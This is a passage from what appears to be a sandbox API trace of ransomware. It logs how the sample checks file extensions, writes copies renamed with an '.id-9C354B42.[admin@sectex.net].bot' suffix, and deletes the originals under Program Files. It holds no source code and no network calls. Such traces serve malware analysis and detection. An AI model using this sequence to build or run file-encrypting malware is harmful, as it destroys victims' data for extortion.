	[0036.318] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=31744) returned 1
	[0036.318] CloseHandle (hObject=0x18c) returned 1
	[0036.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20
	[0036.319] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.319] lstrlenW (lpString=".doc") returned 4
	[0036.319] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0036.319] lstrlenW (lpString=".docx") returned 5
	[0036.319] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1
	[0036.319] lstrlenW (lpString=".pdf") returned 4
	[0036.319] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0036.319] lstrlenW (lpString=".xls") returned 4
	[0036.319] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0036.319] lstrlenW (lpString=".xlsx") returned 5
	[0036.319] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1
	[0036.319] lstrlenW (lpString=".ppt") returned 4
	[0036.319] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0036.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.319] lstrlenW (lpString=".zip") returned 4
	[0036.319] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0036.319] lstrlenW (lpString=".rar") returned 4
	[0036.319] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0036.319] lstrlenW (lpString=".bz2") returned 4
	[0036.319] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0036.319] lstrlenW (lpString=".7z") returned 3
	[0036.319] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0036.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.319] lstrlenW (lpString=".dbf") returned 4
	[0036.319] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0036.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.320] lstrlenW (lpString=".1cd") returned 4
	[0036.320] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0036.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.320] lstrlenW (lpString=".jpg") returned 4
	[0036.320] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.320] lstrlenW (lpString=".doc") returned 4
	[0036.320] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString=".docx") returned 5
	[0036.320] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1
	[0036.320] lstrlenW (lpString=".pdf") returned 4
	[0036.320] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString=".xls") returned 4
	[0036.320] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString=".xlsx") returned 5
	[0036.320] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1
	[0036.320] lstrlenW (lpString=".ppt") returned 4
	[0036.320] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.320] lstrlenW (lpString=".zip") returned 4
	[0036.320] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString=".rar") returned 4
	[0036.320] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString=".bz2") returned 4
	[0036.320] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString=".7z") returned 3
	[0036.320] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0036.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.320] lstrlenW (lpString=".dbf") returned 4
	[0036.320] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0036.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.320] lstrlenW (lpString=".1cd") returned 4
	[0036.320] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0036.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0036.321] lstrlenW (lpString=".jpg") returned 4
	[0036.321] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0036.321] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0036.321] lstrlenW (lpString="ea-sym.xml") returned 10
	[0036.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0036.321] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=749) returned 1
	[0036.321] CloseHandle (hObject=0x18c) returned 1
	[0036.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml")) returned 0x20
	[0036.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.321] lstrlenW (lpString=".doc") returned 4
	[0036.322] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString=".docx") returned 5
	[0036.322] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1
	[0036.322] lstrlenW (lpString=".pdf") returned 4
	[0036.322] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString=".xls") returned 4
	[0036.322] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString=".xlsx") returned 5
	[0036.322] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1
	[0036.322] lstrlenW (lpString=".ppt") returned 4
	[0036.322] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.322] lstrlenW (lpString=".zip") returned 4
	[0036.322] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.322] lstrlenW (lpString=".rar") returned 4
	[0036.322] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString=".bz2") returned 4
	[0036.322] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString=".7z") returned 3
	[0036.322] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.322] lstrlenW (lpString=".dbf") returned 4
	[0036.322] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.322] lstrlenW (lpString=".1cd") returned 4
	[0036.322] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.322] lstrlenW (lpString=".jpg") returned 4
	[0036.322] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.322] lstrlenW (lpString=".doc") returned 4
	[0036.322] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.322] lstrlenW (lpString=".docx") returned 5
	[0036.323] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1
	[0036.323] lstrlenW (lpString=".pdf") returned 4
	[0036.323] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.323] lstrlenW (lpString=".xls") returned 4
	[0036.323] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.323] lstrlenW (lpString=".xlsx") returned 5
	[0036.323] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1
	[0036.323] lstrlenW (lpString=".ppt") returned 4
	[0036.323] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.323] lstrlenW (lpString=".zip") returned 4
	[0036.323] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.323] lstrlenW (lpString=".rar") returned 4
	[0036.323] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.323] lstrlenW (lpString=".bz2") returned 4
	[0036.323] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.323] lstrlenW (lpString=".7z") returned 3
	[0036.323] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.323] lstrlenW (lpString=".dbf") returned 4
	[0036.323] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.323] lstrlenW (lpString=".1cd") returned 4
	[0036.323] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83
	[0036.323] lstrlenW (lpString=".jpg") returned 4
	[0036.323] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.324] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0036.324] lstrlenW (lpString="ja-jp-sym.xml") returned 13
	[0036.324] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.777] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=749) returned 1
	[0036.777] CloseHandle (hObject=0x1a0) returned 1
	[0036.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml")) returned 0x20
	[0036.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.778] lstrlenW (lpString=".doc") returned 4
	[0036.778] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.778] lstrlenW (lpString=".docx") returned 5
	[0036.778] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1
	[0036.778] lstrlenW (lpString=".pdf") returned 4
	[0036.778] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.778] lstrlenW (lpString=".xls") returned 4
	[0036.778] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.778] lstrlenW (lpString=".xlsx") returned 5
	[0036.778] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1
	[0036.778] lstrlenW (lpString=".ppt") returned 4
	[0036.778] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.778] lstrlenW (lpString=".zip") returned 4
	[0036.778] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.778] lstrlenW (lpString=".rar") returned 4
	[0036.778] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.778] lstrlenW (lpString=".bz2") returned 4
	[0036.778] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.778] lstrlenW (lpString=".7z") returned 3
	[0036.778] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.778] lstrlenW (lpString=".dbf") returned 4
	[0036.778] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.778] lstrlenW (lpString=".1cd") returned 4
	[0036.778] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.778] lstrlenW (lpString=".jpg") returned 4
	[0036.779] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.779] lstrlenW (lpString=".doc") returned 4
	[0036.779] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString=".docx") returned 5
	[0036.779] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1
	[0036.779] lstrlenW (lpString=".pdf") returned 4
	[0036.779] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString=".xls") returned 4
	[0036.779] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString=".xlsx") returned 5
	[0036.779] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1
	[0036.779] lstrlenW (lpString=".ppt") returned 4
	[0036.779] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.779] lstrlenW (lpString=".zip") returned 4
	[0036.779] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.779] lstrlenW (lpString=".rar") returned 4
	[0036.779] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString=".bz2") returned 4
	[0036.779] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString=".7z") returned 3
	[0036.779] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.779] lstrlenW (lpString=".dbf") returned 4
	[0036.779] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.779] lstrlenW (lpString=".1cd") returned 4
	[0036.779] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86
	[0036.779] lstrlenW (lpString=".jpg") returned 4
	[0036.779] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.780] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.780] lstrlenW (lpString="AccessMUI.XML") returned 13
	[0036.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.781] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1349) returned 1
	[0036.781] CloseHandle (hObject=0x1a0) returned 1
	[0036.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 0x20
	[0036.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.781] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.781] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.781] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.781] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0036.781] GetLastError () returned 0x0
	[0036.781] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x545, lpOverlapped=0x0) returned 1
	[0036.783] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x550, lpOverlapped=0x0) returned 1
	[0036.784] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.784] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0036.784] SetEndOfFile (hFile=0x1b0) returned 1
	[0036.784] CloseHandle (hObject=0x1b0) returned 1
	[0036.785] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.785] SetEndOfFile (hFile=0x1a0) returned 1
	[0036.786] CloseHandle (hObject=0x1a0) returned 1
	[0036.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.786] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 1
	[0036.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.786] lstrlenW (lpString=".doc") returned 4
	[0036.786] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.786] lstrlenW (lpString=".docx") returned 5
	[0036.786] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0036.786] lstrlenW (lpString=".pdf") returned 4
	[0036.786] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.786] lstrlenW (lpString=".xls") returned 4
	[0036.786] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.786] lstrlenW (lpString=".xlsx") returned 5
	[0036.786] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0036.786] lstrlenW (lpString=".ppt") returned 4
	[0036.786] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.786] lstrlenW (lpString=".zip") returned 4
	[0036.787] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.787] lstrlenW (lpString=".rar") returned 4
	[0036.787] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.787] lstrlenW (lpString=".bz2") returned 4
	[0036.787] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.787] lstrlenW (lpString=".7z") returned 3
	[0036.787] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.787] lstrlenW (lpString=".dbf") returned 4
	[0036.787] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.787] lstrlenW (lpString=".1cd") returned 4
	[0036.787] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.787] lstrlenW (lpString=".jpg") returned 4
	[0036.787] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106
	[0036.787] lstrlenW (lpString=".doc") returned 4
	[0036.787] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.787] lstrlenW (lpString=".docx") returned 5
	[0036.787] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0036.787] lstrlenW (lpString=".pdf") returned 4
	[0036.787] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.787] lstrlenW (lpString=".xls") returned 4
	[0036.787] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.787] lstrlenW (lpString=".xlsx") returned 5
	[0036.787] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0036.787] lstrlenW (lpString=".ppt") returned 4
	[0036.787] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
